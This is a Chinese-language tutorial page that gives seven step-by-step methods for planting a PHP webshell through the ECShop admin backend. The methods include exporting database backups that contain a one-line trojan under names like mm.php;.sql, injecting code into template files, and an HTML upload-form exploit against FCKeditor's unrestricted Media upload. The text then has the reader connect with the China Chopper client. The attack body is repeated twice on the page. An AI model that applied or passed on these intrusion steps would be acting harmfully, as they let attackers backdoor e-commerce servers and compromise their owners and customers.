您现在的位置是:首页 > cms教程 > Ecshop商城教程Ecshop商城教程
ecshop后台拿shell的方法
紫真2025-01-21Ecshop商城教程已有人查阅
导读ecshop后台拿shell总结 ecshop拿shell一、系统==>数据库管理==>sql查询(可爆出物理路径):二、前台留个言,内容是我们的一句话木马: 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份
ecshop后台拿shell总结 ecshop拿shell
一、系统==>数据库管理==>sql查询(可爆出物理路径):
==============创建表失败,导不出shell======================
二、前台留个言,内容是我们的一句话木马: 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)
备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)
三、1、添加会员,会员名称插入插入一句话 : ,其他随便填写。 2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” (其中XXX因各站而异,是数据前缀) 3、备份文件名为mm.php;.sql 4、一句话客户端连接mm.php;.sql,地址一般为 http://baiduhack.com/data/sqldata/mm.php;.sql
四、模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容之后面加入一句话代码: 菜刀链接http:// .baiduhack.com/myship.php 成功。
说明:有些服务器过滤了eval 导致失败。
五、/includes/fckeditor/editor/filemanager/connectors/php/upload.php /includes/fckeditor/editor/filemanager/connectors/php/connector.php /includes/fckeditor/editor/filemanager/connectors/test.html
http://url/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略 对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell 访问路径为
如果不登录后台访问的话是不能利用的,XXOO的。
EXP:
文件地址是:
/images/upload/Media/xx.php
六、
上传txt 并且没有过滤任何函数. 于是运用到了php的文件操作… 将以上代码插入库项目管理中的myship.ini 打开http://url/myship.php 即在http://url/data/目录下生成distant.php;a.txt 菜刀连接之…搞定..
七、 进入后台-系统设置-Flash播放器管理- 直接上传x.php
ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
一、系统==>数据库管理==>sql查询(可爆出物理路径):
==============创建表失败,导不出shell======================
show databases; use 数据库名; create a(cmd text not null); insert into a(cmd) values(‘‘); select cmd from a into outfile ‘导出路径’; drop table if exists a;
==================创建表失败,导不出shell===================二、前台留个言,内容是我们的一句话木马: 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)
备份文件名:x.php;.sql (x.php.sql形式出错,菜刀链接不成功)
三、1、添加会员,会员名称插入插入一句话 : ,其他随便填写。 2、系统==>数据库管理==>数据备份—自定义备份—选“XXX_users” (其中XXX因各站而异,是数据前缀) 3、备份文件名为mm.php;.sql 4、一句话客户端连接mm.php;.sql,地址一般为 http://baiduhack.com/data/sqldata/mm.php;.sql
四、模板管理==>库项目管理==>选择myship.lbi 配送方式。
在文件内容之后面加入一句话代码: 菜刀链接http:// .baiduhack.com/myship.php 成功。
说明:有些服务器过滤了eval 导致失败。
五、/includes/fckeditor/editor/filemanager/connectors/php/upload.php /includes/fckeditor/editor/filemanager/connectors/php/connector.php /includes/fckeditor/editor/filemanager/connectors/test.html
http://url/includes/fckeditor/editor/filemanager/connectors/test.html
代码省略 对Media 没有任何限制. 直接 Type=Media 上传 你的 解密webshell 访问路径为
如果不登录后台访问的话是不能利用的,XXOO的。
EXP:
<form id="frmUpload" enctype="multipart/form-data" action="/includes/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
直接上传PHP马文件地址是:
/images/upload/Media/xx.php
六、
上传txt 并且没有过滤任何函数. 于是运用到了php的文件操作… 将以上代码插入库项目管理中的myship.ini 打开http://url/myship.php 即在http://url/data/目录下生成distant.php;a.txt 菜刀连接之…搞定..
七、 进入后台-系统设置-Flash播放器管理- 直接上传x.php
ecshop V2.7.2 版本已经没有这个选项 ,所以这个已经失效。
本文标签:
很赞哦! ()
上一篇:ecshop退款订单过程逻辑分析
下一篇:ecshop小起订量的设置方法
相关教程
图文教程
ecshop商城优化把ecshop默认302重定向改为301 重定向
ECSHOP商城优化_把ECSHOP默认302重定向改为301 重定向将原有的ECSHOP 302重定向改为301 重定向,避免被搜索引擎封杀catego
ecshop网站transport.js/run() error:undefined处理方法
在ecshop程序里,经常会遇到警示框:transport.js/run() error:undefined ,今天这不又是这个问题,头疼死,js不太好
ecshop首页热门搜索关键词怎么实现随机显示
1、打开 include/lib_main.php 文件,找到下面这段代码,删除之(大概在1652行左右)2 、打开 include/lib_insert.php 文件 ,在文件最下边加入下面这个函数
ecshop商品浏览历史按照浏览先后排序的实现方法
ECSHOP模板中 让浏览历史按照浏览先后进行排序只修改一处,让浏览历史按照浏览先后进行排序经测试,浏览历史目前默认的显示顺序是按照商品的ID排序的
相关源码
-
(自适应)营销型健身器材产品设备类pbootcms模板网站为健身器材企业打造的营销型网站模板,基于PbootCMS开源内核开发。采用HTML5响应式架构,PC与移动端数据实时同步,适配多终端展示场景。查看源码 -
(自适应响应式)投资理财金融机构财务管理pbootcms模板本模板基于PbootCMS系统开发,为投资理财、金融机构等行业设计。采用专业严谨的布局风格,突出金融服务行业特色,适合展示各类理财产品、投资服务和金融资讯。查看源码 -
(自适应响应式)房产合同知识产权企业管理pbootcms模板下载本模板基于PbootCMS系统开发,为知识产权服务、法律咨询及企业合同管理等行业设计。采用严谨专业的布局风格,突出法律文书与知识产权服务行业特色,适合展示各类法律服务和知识产权相关内容。查看源码 -
(自适应手机端)锁锁芯锁具网站pbootcms模板 智能防盗锁网站源码下载本模板基于PbootCMS系统开发,为智能锁具、防盗锁芯及相关安防产品企业设计。采用响应式布局技术,确保在手机、平板和电脑等不同设备上都能获得良好的浏览体验,数据实时同步更新。查看源码 -
(PC+WAP)中英双语户外用品帐篷装备pbootcms网站模板下载这款基于PbootCMS开发的中英文双语模板专为户外装备行业设计,适配PC和移动设备。模板采用现代化设计风格,突出户外产品的功能性和实用性,帮助企业建立专业的国际化展示平台。查看源码 -
(自适应)刷卡pos机数据移动支付设备电子科技pbootcms模板下载本模板为POS机设备制造商、移动支付终端服务商和科技企业设计,基于PbootCMS系统开发,提供完整的在线展示平台解决方案,满足支付设备行业特有的展示需求。查看源码
| 分享笔记 (共有 篇笔记) |